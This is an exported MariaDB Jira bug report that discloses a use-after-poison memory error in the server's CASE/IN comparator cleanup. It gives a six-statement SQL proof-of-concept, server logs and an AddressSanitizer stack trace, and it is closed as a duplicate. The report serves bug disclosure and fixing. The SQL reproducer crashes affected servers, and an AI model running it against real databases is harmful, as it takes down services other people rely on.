[MDEV-26408] use-after-poison security in sql/item_cmpfunc.h Created: 2021-08-19  Updated: 2021-08-27  Resolved: 2021-08-27

Status: Closed
Project: MariaDB Server
Component/s: Data Manipulation - Subquery
Affects Version/s: 10.7
Fix Version/s: N/A

Type: Bug Priority: Major
Reporter: Zhiyong Wu Assignee: Unassigned
Resolution: Duplicate Votes: 0
Labels: None
Environment:

Linux version 5.13.0-1-MANJARO (builduser@LEGION) (gcc (GCC) 11.1.0, GNU ld (GNU Binutils) 2.36.1) #1 SMP PREEMPT Mon Jun 7 06:16:10 UTC 2021 x86_64


Issue Links:
Duplicate
duplicates MDEV-26407 Server crashes in Item_func_in::clean... Closed

Description

PoC:

CREATE TEMPORARY TABLE v0 ( v1 CHAR , NEW INT AS ( CASE 'x' WHEN v1 = 'x' THEN v1 ELSE 'x' = FROM_UNIXTIME ( 2147483647 ) END ) ) ;
UPDATE v0 SET v1 = 0 , v1 = 95 WHERE v1 = 5 AND v1 = -1 ;
SELECT length ( least ( 'x' 'x' 'x' 'x' ^ 0 + 'x' ^ 79070223.000000 + 93 ^ 25145487.000000 + -128 ^ 72176287.000000 , 'x' ) ) FROM DUAL ;
DELETE FROM v0 WHERE ( v1 , v1 ) IN ( ( 8 , 'x' ) , ( 45 , 'x' ) ) ORDER BY v1 , v1 LIMIT 15 ;
SET GLOBAL READ_ONLY = YEAR ( str_to_date ( 'x' , NULL ) ) ;
USE WARNINGS ;

Asan report:

2021-08-16 14:41:38 0 [Note] InnoDB: Compressed tables use zlib 1.2.11
2021-08-16 14:41:38 0 [Note] InnoDB: Number of pools: 1
2021-08-16 14:41:38 0 [Note] InnoDB: Using crc32 + pclmulqdq instructions
2021-08-16 14:41:38 0 [Note] mysqld: O_TMPFILE is not supported on /tmp (disabling future attempts)
2021-08-16 14:41:38 0 [Note] InnoDB: Using liburing
2021-08-16 14:41:38 0 [Note] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728
2021-08-16 14:41:38 0 [Note] InnoDB: Completed initialization of buffer pool
2021-08-16 14:41:38 0 [Note] InnoDB: 128 rollback segments are active.
2021-08-16 14:41:38 0 [Note] InnoDB: Creating shared tablespace for temporary tables
2021-08-16 14:41:38 0 [Note] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...
2021-08-16 14:41:38 0 [Note] InnoDB: File './ibtmp1' size is now 12 MB.
2021-08-16 14:41:38 0 [Note] InnoDB: 10.7.0 started; log sequence number 42161; transaction id 14
2021-08-16 14:41:38 0 [Note] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/mysql-default-data/ib_buffer_pool
2021-08-16 14:41:38 0 [Note] Plugin 'FEEDBACK' is disabled.
2021-08-16 14:41:38 0 [Note] InnoDB: Buffer pool(s) load completed at 210816 14:41:38
2021-08-16 14:41:38 0 [Note] Server socket created on IP: '0.0.0.0'.
2021-08-16 14:41:38 0 [Note] Server socket created on IP: '::'.
2021-08-16 14:41:38 0 [Note] /usr/local/mysql/bin//mysqld: ready for connections.
Version: '10.7.0-MariaDB'  socket: '/tmp/0.socket'  port: 3306  Source distribution
2021-08-16 14:41:39 0 [Note] /usr/local/mysql/bin//mysqld (initiated by: root[root] @ localhost []): Normal shutdown
2021-08-16 14:41:39 0 [Note] InnoDB: FTS optimize thread exiting.
2021-08-16 14:41:39 0 [Note] InnoDB: Starting shutdown...
2021-08-16 14:41:39 0 [Note] InnoDB: Dumping buffer pool(s) to /home/fuboat/mariadb-tmp/mysql-default-data/ib_buffer_pool
2021-08-16 14:41:39 0 [Note] InnoDB: Buffer pool(s) dump completed at 210816 14:41:39
2021-08-16 14:41:39 0 [Note] InnoDB: Removed temporary tablespace data file: "./ibtmp1"
2021-08-16 14:41:39 0 [Note] InnoDB: Shutdown completed; log sequence number 42173; transaction id 15
2021-08-16 14:41:39 0 [Note] /usr/local/mysql/bin//mysqld: Shutdown complete
 
2021-08-16 14:55:18 0 [Note] InnoDB: Compressed tables use zlib 1.2.11
2021-08-16 14:55:18 0 [Note] InnoDB: Number of pools: 1
2021-08-16 14:55:18 0 [Note] InnoDB: Using crc32 + pclmulqdq instructions
2021-08-16 14:55:18 0 [Note] mysqld: O_TMPFILE is not supported on /tmp (disabling future attempts)
2021-08-16 14:55:18 0 [Note] InnoDB: Using liburing
2021-08-16 14:55:18 0 [Note] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728
2021-08-16 14:55:18 0 [Note] InnoDB: Completed initialization of buffer pool
2021-08-16 14:55:28 0 [Note] InnoDB: 128 rollback segments are active.
2021-08-16 14:55:28 0 [Note] InnoDB: Creating shared tablespace for temporary tables
2021-08-16 14:55:28 0 [Note] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...
2021-08-16 14:55:28 0 [Note] InnoDB: File './ibtmp1' size is now 12 MB.
2021-08-16 14:55:29 0 [Note] InnoDB: 10.7.0 started; log sequence number 42173; transaction id 14
2021-08-16 14:55:29 0 [Note] Plugin 'FEEDBACK' is disabled.
2021-08-16 14:55:29 0 [Note] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/17/ib_buffer_pool
2021-08-16 14:55:29 0 [Note] Server socket created on IP: '0.0.0.0'.
2021-08-16 14:55:29 0 [Note] Server socket created on IP: '::'.
2021-08-16 14:55:29 0 [Note] InnoDB: Buffer pool(s) load completed at 210816 14:55:29
2021-08-16 14:55:29 0 [Note] /usr/local/mysql/bin//mysqld: ready for connections.
Version: '10.7.0-MariaDB'  socket: '/tmp/17.socket'  port: 10017  Source distribution
=================================================================
==3376229==ERROR: AddressSanitizer: use-after-poison on address 0x6290000889f8 at pc 0x560b3515065f bp 0x7f31f2db85d0 sp 0x7f31f2db85c0
READ of size 8 at 0x6290000889f8 thread T13
    #0 0x560b3515065e in Predicant_to_list_comparator::Predicant_to_value_comparator::cleanup() /experiment/mariadb-server/sql/item_cmpfunc.h:2105
    #1 0x560b3515065e in Predicant_to_list_comparator::cleanup() /experiment/mariadb-server/sql/item_cmpfunc.h:2214
    #2 0x560b3515065e in Item_func_case_simple::cleanup() /experiment/mariadb-server/sql/item_cmpfunc.h:2397
    #3 0x560b347a08c3 in Item::delete_self() /experiment/mariadb-server/sql/item.h:2522
    #4 0x560b347a08c3 in Query_arena::free_items() /experiment/mariadb-server/sql/sql_class.cc:3823
    #5 0x560b34bec7d8 in closefrm(TABLE*) /experiment/mariadb-server/sql/table.cc:4434
    #6 0x560b34ec50f4 in THD::close_temporary_table(TABLE*) /experiment/mariadb-server/sql/temporary_tables.cc:1238
    #7 0x560b34ec7464 in THD::close_temporary_tables() /experiment/mariadb-server/sql/temporary_tables.cc:531
    #8 0x560b347a19ef in THD::cleanup() /experiment/mariadb-server/sql/sql_class.cc:1549
    #9 0x560b345a51c4 in unlink_thd(THD*) /experiment/mariadb-server/sql/mysqld.cc:2686
    #10 0x560b34ca494b in do_handle_one_connection(CONNECT*, bool) /experiment/mariadb-server/sql/sql_connect.cc:1429
    #11 0x560b34ca533c in handle_one_connection /experiment/mariadb-server/sql/sql_connect.cc:1312
    #12 0x560b35735c2b in pfs_spawn_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201
    #13 0x7f3212044258 in start_thread (/usr/lib/libpthread.so.0+0x9258)
    #14 0x7f3211bef5e2 in __GI___clone (/usr/lib/libc.so.6+0xfe5e2)
 
0x6290000889f8 is located 6136 bytes inside of 16400-byte region [0x629000087200,0x62900008b210)
allocated by thread T13 here:
    #0 0x7f32126d6279 in __interceptor_malloc /build/gcc/src/gcc/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x560b360689a8 in my_malloc /experiment/mariadb-server/mysys/my_malloc.c:90
    #2 0x560b36054e40 in reset_root_defaults /experiment/mariadb-server/mysys/my_alloc.c:243
    #3 0x560b347961b8 in THD::init_for_queries() /experiment/mariadb-server/sql/sql_class.cc:1405
    #4 0x560b34ca2d51 in prepare_new_connection_state(THD*) /experiment/mariadb-server/sql/sql_connect.cc:1240
    #5 0x560b34ca365f in thd_prepare_connection(THD*) /experiment/mariadb-server/sql/sql_connect.cc:1333
    #6 0x560b34ca365f in thd_prepare_connection(THD*) /experiment/mariadb-server/sql/sql_connect.cc:1322
    #7 0x560b34ca4e0a in do_handle_one_connection(CONNECT*, bool) /experiment/mariadb-server/sql/sql_connect.cc:1408
    #8 0x560b34ca533c in handle_one_connection /experiment/mariadb-server/sql/sql_connect.cc:1312
    #9 0x560b35735c2b in pfs_spawn_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201
    #10 0x7f3212044258 in start_thread (/usr/lib/libpthread.so.0+0x9258)
 
Thread T13 created by T0 here:
    #0 0x7f3212677fa7 in __interceptor_pthread_create /build/gcc/src/gcc/libsanitizer/asan/asan_interceptors.cpp:216
    #1 0x560b35735ea9 in my_thread_create /experiment/mariadb-server/storage/perfschema/my_thread.h:48
    #2 0x560b35735ea9 in pfs_spawn_thread_v1 /experiment/mariadb-server/storage/perfschema/pfs.cc:2252
    #3 0x560b345a6b3c in inline_mysql_thread_create /experiment/mariadb-server/include/mysql/psi/mysql_thread.h:1139
    #4 0x560b345a6b3c in create_thread_to_handle_connection(CONNECT*) /experiment/mariadb-server/sql/mysqld.cc:5934
    #5 0x560b345b27b6 in handle_accepted_socket(st_mysql_socket, st_mysql_socket) /experiment/mariadb-server/sql/mysqld.cc:6055
    #6 0x560b345b336f in handle_connections_sockets() /experiment/mariadb-server/sql/mysqld.cc:6179
    #7 0x560b345b6a52 in mysqld_main(int, char**) /experiment/mariadb-server/sql/mysqld.cc:5829
    #8 0x7f3211b18b24 in __libc_start_main (/usr/lib/libc.so.6+0x27b24)
 
SUMMARY: AddressSanitizer: use-after-poison /experiment/mariadb-server/sql/item_cmpfunc.h:2105 in Predicant_to_list_comparator::Predicant_to_value_comparator::cleanup()
Shadow bytes around the buggy address:
  0x0c52800090e0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c52800090f0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c5280009100: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c5280009110: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c5280009120: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
=>0x0c5280009130: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7[f7]
  0x0c5280009140: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c5280009150: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c5280009160: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c5280009170: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c5280009180: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==3376229==ABORTING
GNU gdb (GDB) 10.2
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-pc-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.
 
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /usr/local/mysql/bin//mysqld...
(gdb) (gdb) (gdb) quit


Generated at Thu Feb 08 09:45:05 UTC 2024 using Jira 8.20.16#820016-sha1:9d11dbea5f4be3d4cc21f03a88dd11d8c8687422.